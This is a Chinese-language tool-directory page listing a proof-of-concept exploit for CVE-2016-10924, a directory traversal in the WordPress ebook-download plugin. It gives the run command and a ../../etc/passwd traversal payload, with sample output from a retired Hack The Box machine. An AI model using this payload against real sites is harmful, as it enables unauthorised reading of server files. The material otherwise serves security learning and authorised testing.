Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2016-10924-POC — 概念验证(PoC)漏洞利用脚本,针对 WordPress 插件 ebook-download(版本 < 1.2)中的目录遍历漏洞(CVE-2016-10924)。该漏洞允许通过精心构造的 GET 请求进行未授权的文件读取。 | Kitploit
工具/GitHubGitHub/alealeluyah/cve-2016-10924-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubalealeluyah/cve-2016-10924-poc

cve-2016-10924-POC

概念验证(PoC)漏洞利用脚本,针对 WordPress 插件 ebook-download(版本 < 1.2)中的目录遍历漏洞(CVE-2016-10924)。该漏洞允许通过精心构造的 GET 请求进行未授权的文件读取。

查看仓库
111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2016-10924-POC

此仓库包含针对 WordPress 插件 ebook-download(版本 < 1.2)中 目录遍历 漏洞(CVE-2016-10924)的概念验证(PoC)利用脚本。

该漏洞允许通过精心构造的 GET 请求未授权读取文件。该利用利用一个名为 ebookdownloadurl 的参数来遍历目标服务器上的目录。

描述

  • CVE-ID: CVE-2016-10924
  • 漏洞类型: 目录遍历
  • 受影响组件: WordPress 的 ebook-download 插件 < 1.2
  • 影响: 远程攻击者可以通过操纵 ebookdownloadurl 参数中的文件路径,读取底层操作系统上的任意文件,例如 /etc/passwd。

注意: 此 PoC 仅用于 教育和授权测试 目的。滥用此信息可能导致法律后果。

要求

  • Python 3。
  • requests 库(通过 pip install requests 安装)

使用方法

  1. 克隆仓库:

    root@kitploit:~
    git clone https://github.com/your-user/CVE-2016-10924-POC.git
    cd CVE-2016-10924-POC
    
  2. 安装依赖:

    root@kitploit:~
    pip install requests
    
  3. 运行利用脚本:

    root@kitploit:~
    python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
    
  4. 指定要读取的文件路径: 启动脚本后,系统会提示您输入文件路径。例如:

    root@kitploit:~
    ../../../../../../../../../etc/passwd
    

    您可能需要根据目标环境中的 web 根目录位置调整 ../ 的数量。

  5. 退出:

    • 键入 exit、quit,或在空提示符下按 Enter 键退出。
    • 按 Ctrl + C 立即停止脚本。

示例

我在已退役的 Hack The Box 机器 "Backdoor" 上使用了此利用脚本:

root@kitploit:~
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] 输入文件路径(例如 ../../../../../etc/passwd)。键入 'exit' 退出。

Enter File path: ../../../../../../../../../etc/passwd
[*] 目标 URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] 状态码: 200
[+] 文件内容:
root:x:0:0:root:/root:/bin/bash
...

免责声明

本项目仅用于 教育 和 合法的安全测试 目的。
请勿 对任何未经明确授权的系统使用本仓库中的信息或脚本。
作者和贡献者对因使用此工具而导致的任何滥用或损坏 不承担任何责任。

许可证

本项目采用 GNU 2.0 许可证 进行许可。欢迎使用和修改,但请注明出处。


参考资料

  • NVD - CVE-2016-10924
  • WordPress 插件 ebook-download (关于易受攻击版本的参考)
下载工具